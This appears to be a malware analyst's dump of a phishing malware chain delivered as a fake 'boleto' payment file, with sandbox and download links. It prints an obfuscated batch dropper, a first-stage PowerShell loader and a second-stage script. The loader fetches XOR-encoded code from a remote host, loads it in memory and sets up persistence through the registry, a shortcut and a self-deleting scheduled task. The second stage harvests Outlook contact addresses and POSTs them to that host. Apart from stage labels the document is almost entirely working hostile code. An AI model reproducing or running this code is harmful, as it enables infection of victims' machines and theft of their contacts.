Client maximus

1. https://app.any.run/tasks/db253ae2-2864-479d-a0dd-de0dbfe73796
2. https://transfer.sh/DsEla/files.7z
3.  
4. http://higridis.site/boleto.php -> https://www.dropbox.com/s/7tc757lrqz48ojm/Termo-Acerto_1525379604.zip?dl=1
5.  
6. Termo-Acerto_1525379604.cmd:
7.  
8. @echo off
9. cd %SystemRoot%\System32
10. set fTP=
11. Set fTP=%fTP%Cq2a
12. Set fTP=%fTP%SiK7
13. Set fTP=%fTP%rmhc
14. Set fTP=%fTP%zXwB
15. Set fTP=%fTP%8yIM
16. Set fTP=%fTP%1uYj
17. Set fTP=%fTP%Je6k
18. Set fTP=%fTP%G0fO
19. Set fTP=%fTP%dtsF
20. Set fTP=%fTP%5gPv
21. Set fTP=%fTP%VQE3
22. Set fTP=%fTP%4oWT
23. Set fTP=%fTP%DUZ9
24. Set fTP=%fTP%nlLx
25. Set fTP=%fTP%pHAb
26. Set fTP=%fTP%RN
27. set aa=^|
28. set data=
29. Set data=%data%%fTP:~5,1%%fTP:~42,1%%fTP:~13,1%("%fTP:~18,1%%fTP:~42,1%%fTP:~55,1%(%fTP:~61,1%%fTP:~25,1%
30. Set data=%data%%fTP:~46,1%-%fTP:~45,1%%fTP:~59,1%%fTP:~24,1%%fTP:~25,1%%fTP:~11,1%%fTP:~47,1% %fTP:~61,1%%fTP:~25,1%
31. Set data=%data%%fTP:~47,1%.%fTP:~14,1%%fTP:~42,1%%fTP:~15,1%%fTP:~11,1%%fTP:~54,1%%fTP:~18,1%%fTP:~25,1%%fTP:~52,1%%fTP:~33,1%
32. Set data=%data%).%fTP:~32,1%%fTP:~31,1%%fTP:~46,1%%fTP:~52,1%%fTP:~54,1%%fTP:~31,1%%fTP:~3,1%%fTP:~48,1%%fTP:~34,1%
33. Set data=%data%%fTP:~47,1%%fTP:~8,1%%fTP:~5,1%%fTP:~52,1%%fTP:~28,1%('%fTP:~10,1%%fTP:~33,1%%fTP:~33,1%
34. Set data=%data%%fTP:~56,1%%fTP:~34,1%://%fTP:~32,1%%fTP:~53,1%%fTP:~9,1%.%fTP:~52,1%%fTP:~3,1%
35. Set data=%data%%fTP:~32,1%%fTP:~45,1%%fTP:~53,1%%fTP:~33,1%.%fTP:~11,1%%fTP:~45,1%%fTP:~9,1%/?%fTP:~32,1%
36. Set data=%data%%fTP:~9,1%%fTP:~24,1%%fTP:~5,1%%fTP:~21,1%%fTP:~58,1%%fTP:~3,1%%fTP:~28,1%%fTP:~22,1%%fTP:~26,1%%fTP:~42,1%%fTP:~0,1%
37. Set data=%data%%fTP:~51,1%%fTP:~50,1%%fTP:~33,1%%fTP:~15,1%%fTP:~25,1%%fTP:~16,1%%fTP:~56,1%%fTP:~6,1%%fTP:~47,1%%fTP:~19,1%%fTP:~0,1%
38. Set data=%data%%fTP:~4,1%%fTP:~37,1%%fTP:~56,1%%fTP:~60,1%%fTP:~25,1%%fTP:~40,1%%fTP:~13,1%%fTP:~53,1%%fTP:~3,1%%fTP:~20,1%%fTP:~54,1%
39. Set data=%data%%fTP:~48,1%%fTP:~56,1%%fTP:~22,1%%fTP:~52,1%%fTP:~14,1%%fTP:~36,1%%fTP:~32,1%%fTP:~13,1%%fTP:~30,1%%fTP:~34,1%%fTP:~0,1%
40. Set data=%data%%fTP:~18,1%%fTP:~54,1%%fTP:~13,1%%fTP:~3,1%%fTP:~43,1%%fTP:~35,1%%fTP:~23,1%%fTP:~55,1%%fTP:~60,1%%fTP:~49,1%%fTP:~23,1%
41. Set data=%data%%fTP:~32,1%%fTP:~23,1%%fTP:~34,1%%fTP:~17,1%%fTP:~60,1%%fTP:~31,1%%fTP:~4,1%%fTP:~34,1%%fTP:~31,1%%fTP:~4,1%%fTP:~31,1%
42. Set data=%data%%fTP:~1,1%%fTP:~23,1%%fTP:~8,1%%fTP:~23,1%%fTP:~59,1%%fTP:~31,1%%fTP:~46,1%%fTP:~21,1%%fTP:~8,1%%fTP:~54,1%%fTP:~61,1%
43. Set data=%data%%fTP:~47,1%%fTP:~39,1%%fTP:~18,1%%fTP:~28,1%%fTP:~58,1%%fTP:~3,1%%fTP:~58,1%%fTP:~45,1%%fTP:~40,1%%fTP:~14,1%%fTP:~43,1%
44. Set data=%data%%fTP:~27,1%%fTP:~48,1%%fTP:~16,1%%fTP:~2,1%/%fTP:~46,1%%fTP:~8,1%%fTP:~18,1%%fTP:~38,1%%fTP:~58,1%%fTP:~59,1%
45. Set data=%data%%fTP:~43,1%%fTP:~40,1%%fTP:~50,1%%fTP:~9,1%%fTP:~48,1%%fTP:~50,1%%fTP:~3,1%/%fTP:~5,1%%fTP:~58,1%%fTP:~51,1%
46. Set data=%data%%fTP:~36,1%')");
47. echo %%data%%%aa%%fTP:~46,1%%fTP:~5,1%%fTP:~52,1%%fTP:~32,1%%fTP:~45,1%%fTP:~14,1%%fTP:~34,1%%fTP:~38,1%%fTP:~45,1%%fTP:~14,1%%fTP:~25,1%%fTP:~8,1%%fTP:~4,1%%fTP:~10,1%%fTP:~25,1%%fTP:~53,1%%fTP:~53,1%\%fTP:~39,1%%fTP:~20,1%.%fTP:~29,1%\%fTP:~56,1%%fTP:~45,1%%fTP:~14,1%%fTP:~25,1%%fTP:~8,1%%fTP:~34,1%%fTP:~10,1%%fTP:~25,1%%fTP:~53,1%%fTP:~53,1%.%fTP:~25,1%%fTP:~55,1%%fTP:~25,1% -%fTP:~52,1%%fTP:~45,1%%fTP:~56,1% -%fTP:~14,1%%fTP:~5,1%%fTP:~52,1% %fTP:~20,1% -
48.  
49. 1st stage:
50.  
51. $fileName = "$env:TEMP\$([System.DateTime]::Now.ToString('yyyyMMdd'))"
52. $bExists = [System.IO.File]::Exists($fileName)
53.  
54. if (-Not $bExists) {
55. "" | Set-Content $fileName
56.  
57. $bytes = (New-Object Net.WebClient).DownloadData("https://dlm.nadolt.com/?dmNvsQSFZqUA8ptBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbOWurLMjuHl4AB6tr3Eb//fWEH/0b3Vc1B8S+3gx5")
58.  
59. for($i=0; $i -lt $bytes.count; $i++) {
60. $bytes[$i] = $bytes[$i] -bxor 0x6A
61. }
62.  
63. [Reflection.Assembly]::Load($bytes)
64.  
65. $rInt = [Loader]::randomInt(4, 16)
66. $prefix = "$([Loader]::RandomString($rInt))-"
67.  
68. [Loader]::Go3("https://dlm.nadolt.com","dmBkvwaGaqEA9JtBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbPFOwN9DFNHgABIFrh0b7oqGxFKsXkFNmDJY=","dmFlsQGAZacF95tBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbPFOwN9DFNHgABIFrwGzs2KWxQfwfmFE0BZU=","dWRiuwGCYKdOoZ5uaslIatKzrpM7UgxV6Lz7bmE0QXHGC4HxaEtS0jo3UiQSRPqoPSGqi7rzFHiAN87dMGYAAZ9D80Ls2/L9TLFDxwE2AJHv2Q==","dWFksACDZ6UF9JtBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbPFOwN9DFNHgABIFrwG3Ry6yEH/0b3VE2BZC/3A56",$prefix)
69.  
70. $var1 = [Loader]::RandomString($rInt)
71. $var2 = [Loader]::RandomString($rInt)
72. $var3 = [Loader]::RandomString($rInt)
73.  
74. $cmdFileName = "$([Loader]::outDir)\$([Loader]::RandomString([Loader]::randomInt(6, 16))).cmd"
75.  
76. $cmdSource = "@Echo off`r`n"
77. $cmdSource += "Setlocal EnableExtensions`r`n"
78. $cmdSource += "Setlocal EnableDelayedExpansion`r`n"
79. $cmdSource += "Set $var1=HKCU`r`n"
80. $cmdSource += "Set $var1=%$var1%\Software`r`n"
81. $cmdSource += "Set $var1=%$var1%\Microsoft`r`n"
82. $cmdSource += "Set $var2=`r`n"
83. $cmdSource += "FOR /F `"usebackq tokens=1,2*`" %%1 IN (``REG QUERY %$var1%``) DO (`r`n"
84. $cmdSource += "Set $var3=%%11`r`n"
85. $cmdSource += "IF `"!$var3`:~0,$($prefix.Length)!`"==`"$prefix`" (`r`n"
86. $cmdSource += "Set $var2=!$var2!%%3`r`n"
87. $cmdSource += ")`r`n"
88. $cmdSource += ")`r`n"
89. $cmdSource += "%$var2%`r`n"
90. $cmdSource | Set-Content $cmdFileName
91.  
92. $lnkFileName = "$([Loader]::outDir)\$env:USERNAME.lnk"
93. $WshShell = New-Object -comObject WScript.Shell
94. $Shortcut = $WshShell.CreateShortcut($lnkFilename)
95. $Shortcut.TargetPath = $cmdFileName
96. $Shortcut.WindowStyle = 7
97. $Shortcut.Save()
98.  
99. $TaskStartTime = [datetime]::Now.AddSeconds(5)
100. $TaskEndTime = [datetime]::Now.AddSeconds(35)
101.  
102. $taskName = [Loader]::RandomString($rInt)
103.  
104. $service = New-Object -ComObject("Schedule.Service")
105. $service.Connect()
106.  
107. $rootFolder = $service.GetFolder("\")
108.  
109. $TaskDefinition = $service.NewTask(0)
110. $TaskDefinition.RegistrationInfo.Description = ""
111. $TaskDefinition.Settings.Enabled = $true
112. $TaskDefinition.Settings.DisallowStartIfOnBatteries = $false
113. $TaskDefinition.Settings.DeleteExpiredTaskAfter = "PT0M"
114.  
115. $triggers = $TaskDefinition.Triggers
116. $trigger = $triggers.Create(1)
117. $trigger.StartBoundary = $TaskStartTime.ToString("yyyy-MM-dd'T'HH:mm:ss")
118. $trigger.EndBoundary = $TaskEndTime.ToString("yyyy-MM-dd'T'HH:mm:ss")
119. $trigger.Enabled = $true
120.  
121. $action = $TaskDefinition.Actions.Create(0)
122. $action.Path = $cmdFileName
123. $action.Arguments = ""
124.  
125. $action = $TaskDefinition.Actions.Create(0)
126. $action.Path = "schtasks.exe"
127. $action.Arguments = "/Delete /F /TN $taskName"
128.  
129. $rootFolder.RegisterTaskDefinition($taskName, $TaskDefinition, 6, "", $null, 0)
130.  
131. $urlPL = "https://dlm.nadolt.com/?dmRlsQKLZasK8JtBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbIVOwT9TuamdZH69NzWvW2++EHJxP7gpNXcDdhQRgMAEFpAYlS6o="
132. IEX(New-Object Net.WebClient).DownloadString("https://dlm.nadolt.com/?dmVjuw2Aa6ID9ZtBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbIVOwT83WAXs4HpFoxEb4w/WCGIRPxzI5Cdq83F0tMARSpw==")
133. }
134.  
135. 2nd stage:
136. Add-Type -assembly $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAGMAcgBvAHMAbwBmAHQALgBPAGYAZgBpAGMAZQAuAEkAbgB0AGUAcgBvAHAALgBPAHUAdABsAG8AbwBrAA==')))
137. ${_/=\/\__/=\/\/\__} = New-Object -comobject Outlook.Application
138. ${____/===\_____/\/} = ${_/=\/\__/=\/\/\__}.GetNameSpace($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBBAFAASQA='))))
139. ${_/\/=====\__/=\/=} = [System.Collections.ArrayList]@()
140. function ___/=\/\/=\___/=\_(${____/\____/\/\_/\_})
141. {
142. ${____/==\__/\_/=\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XgBbAF8AYQAtAHoAMAAtADkALQBdACsAKABcAC4AWwBfAGEALQB6ADAALQA5AC0AXQArACkAKgBAAFsAYQAtAHoAMAAtADkALQBdACsAKABcAC4AWwBhAC0AegAwAC0AOQAtAF0AKwApACoAKABcAC4AWwBhAC0AegBdAHsAMgAsADQAfQApACQA')));
143. if (${____/\____/\/\_/\_} -match ${____/==\__/\_/=\_}) {
144. return $true
145. }
146. return $false
147. }
148. function _/=\_/==\____/\__/(${____/\____/\/\_/\_}) {
149. if (${____/\____/\/\_/\_}) {
150. ${__/=====\/\_/\_/\} = $false
151. ${____/\____/\/\_/\_} = ${____/\____/\/\_/\_}.ToLower()
152. if (${____/\____/\/\_/\_}.StartsWith("'") -And ${____/\____/\/\_/\_}.EndsWith("'")) {
153. ${____/\____/\/\_/\_} = ${____/\____/\/\_/\_}.Substring(1, ${____/\____/\/\_/\_}.Length - 2)
154. }
155. if (___/=\/\/=\___/=\_(${____/\____/\/\_/\_})) {
156. for(${__/\/\__/=\/\__/\} = 0;${__/\/\__/=\/\__/\} -lt ${_/\/=====\__/=\/=}.Count;${__/\/\__/=\/\__/\}++) {
157. if (${_/\/=====\__/=\/=}[${__/\/\__/=\/\__/\}] -eq ${____/\____/\/\_/\_}) {
158. ${__/=====\/\_/\_/\} = $true
159. break
160. }
161. }
162. if (-Not ${__/=====\/\_/\_/\}) {
163. ${__/\___/========\} = ${_/\/=====\__/=\/=}.Add(${____/\____/\/\_/\_})
164. }
165. }
166. }
167. }
168. function _/====\__/=====\_/ {
169. ${/==\/=\____/\_/=\} = ${____/===\_____/\/}.AddressLists
170. for(${__/\/\__/=\/\__/\} = 1;${__/\/\__/=\/\__/\} -le ${/==\/=\____/\_/=\}.Count;${__/\/\__/=\/\__/\}++) {
171. ${/=\_/==\/\__/==\_} = ${/==\/=\____/\_/=\}.Item(${__/\/\__/=\/\__/\}).AddressEntries
172. for(${/==\/\/\_/\_/\__/} = 1;${/==\/\/\_/\_/\__/} -le ${/=\_/==\/\__/==\_}.Count;${/==\/\/\_/\_/\__/}++) {
173. ${_/\_/\__/\_____/=} = ${/=\_/==\/\__/==\_}.Item(${/==\/\/\_/\_/\__/})
174. ${__/===\/===\/\/\_} = ${_/\_/\__/\_____/=}.AddressEntryUserType
175. ${____/\____/\/\_/\_} = ""
176. if (${__/===\/===\/\/\_} -eq 10) {
177. ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.Address
178. } elseif ((${__/===\/===\/\/\_} -eq 3) -Or (${__/===\/===\/\/\_} -eq 1) -Or (${__/===\/===\/\/\_} -eq 4) -Or (${__/===\/===\/\/\_} -eq 2) -Or (${__/===\/===\/\/\_} -eq 5) -Or (${__/===\/===\/\/\_} -eq 0)) {
179. ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.GetExchangeUser().PrimarySmtpAddress
180. }
181. _/=\_/==\____/\__/(${____/\____/\/\_/\_})
182. }
183. }
184. }
185. function __/\/\__/\_/===\_/(${___/\/==\_/==\/=\/}) {
186. for(${__/\/\__/=\/\__/\} = 1;${__/\/\__/=\/\__/\} -le ${___/\/==\_/==\/=\/}.Count;${__/\/\__/=\/\__/\}++) {
187. ${_/======\_/=\/=\_} = ${___/\/==\_/==\/=\/}.Item(${__/\/\__/=\/\__/\})
188. ${__/\/=\___/\_/==\} = ${_/======\_/=\/=\_}.Items
189. for(${/==\/\/\_/\_/\__/} = 1;${/==\/\/\_/\_/\__/} -le ${__/\/=\___/\_/==\}.Count;${/==\/\/\_/\_/\__/}++) {
190. ${_/==\_____/==\__/} = ${__/\/=\___/\_/==\}.Item(${/==\/\/\_/\_/\__/})
191. ${/=\/====\____/=\/} = ${_/==\_____/==\__/}.Recipients
192. for(${_/\_/\__/\/\_/=\_} = 1;${_/\_/\__/\/\_/=\_} -le ${/=\/====\____/=\/}.Count;${_/\_/\__/\/\_/=\_}++) {
193. ${__/\_/\__/=\/\_/\} = ${/=\/====\____/=\/}.Item(${_/\_/\__/\/\_/=\_})
194. ${_/\_/\__/\_____/=} = ${__/\_/\__/=\/\_/\}.AddressEntry
195. ${__/===\/===\/\/\_} = ${_/\_/\__/\_____/=}.AddressEntryUserType
196. ${____/\____/\/\_/\_} = "";
197. if (${__/===\/===\/\/\_} -eq 0) {
198. ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.GetExchangeUser().PrimarySmtpAddress
199. } elseif ((${__/===\/===\/\/\_} -eq 30) -Or (${__/===\/===\/\/\_} -eq 10)) {
200. ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.Address
201. }
202. _/=\_/==\____/\__/(${____/\____/\/\_/\_})
203. }
204. ${_/\_/\__/\_____/=} = ${_/==\_____/==\__/}.Sender
205. ${__/===\/===\/\/\_} = ${_/\_/\__/\_____/=}.AddressEntryUserType
206. ${____/\____/\/\_/\_} = "";
207. if (${__/===\/===\/\/\_} -eq 0) {
208. ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.GetExchangeUser().PrimarySmtpAddress
209. } elseif ((${__/===\/===\/\/\_} -eq 30) -Or (${__/===\/===\/\/\_} -eq 10)) {
210. ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.Address
211. }
212. _/=\_/==\____/\__/(${____/\____/\/\_/\_})
213. }
214. __/\/\__/\_/===\_/(${_/======\_/=\/=\_}.Folders)
215. }
216. }
217. function ____/=\_/\_/==\/==() {
218. _/====\__/=====\_/
219. __/\/\__/\_/===\_/(${____/===\_____/\/}.Folders)
220. ${/\_____/\_/\/==\/} = [System.Runtime.Interopservices.Marshal]::ReleaseComObject(${_/=\/\__/=\/\/\__})
221. ${_/\__/\/\/\_/\/=\} = [System.Net.WebRequest]::Create($urlPL)
222. ${/=\___/==\/=\__/=} = [System.Text.Encoding]::UTF8.GetBytes("list=$(${_/\/=====\__/=\/=} -join ';')")
223. ${_/\__/\/\/\_/\/=\}.Method = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABPAFMAVAA=')))
224. ${_/\__/\/\/\_/\/=\}.ContentType = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AeAAtAHcAdwB3AC0AZgBvAHIAbQAtAHUAcgBsAGUAbgBjAG8AZABlAGQA')))
225. ${_/\__/\/\/\_/\/=\}.ContentLength = ${/=\___/==\/=\__/=}.length
226. ${___/=\_/\/\/=\___} = ${_/\__/\/\/\_/\/=\}.GetRequestStream()
227. ${___/=\_/\/\/=\___}.Write(${/=\___/==\/=\__/=}, 0, ${/=\___/==\/=\__/=}.length)
228. ${___/=\_/\/\/=\___}.Close()
229. [System.Net.WebResponse] ${/===\/=\____/\/=\} = ${_/\__/\/\/\_/\/=\}.GetResponse()
230. }
231. function _/=\/\/\_/\____/=\() {
232. ${__/======\____/\_} = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABNAGkAYwByAG8AcwBvAGYAdABcAC4ATwB1AHQAbABvAG8AawA=')))
233. ${__/==\/\__/\/===\} = [System.IO.File]::Exists(${__/======\____/\_})
234. if (-Not ${__/==\/\__/\/===\}) {
235. "" | sc ${__/======\____/\_}
236. ____/=\_/\_/==\/==
237. }
238. }
239. _/=\/\/\_/\____/=\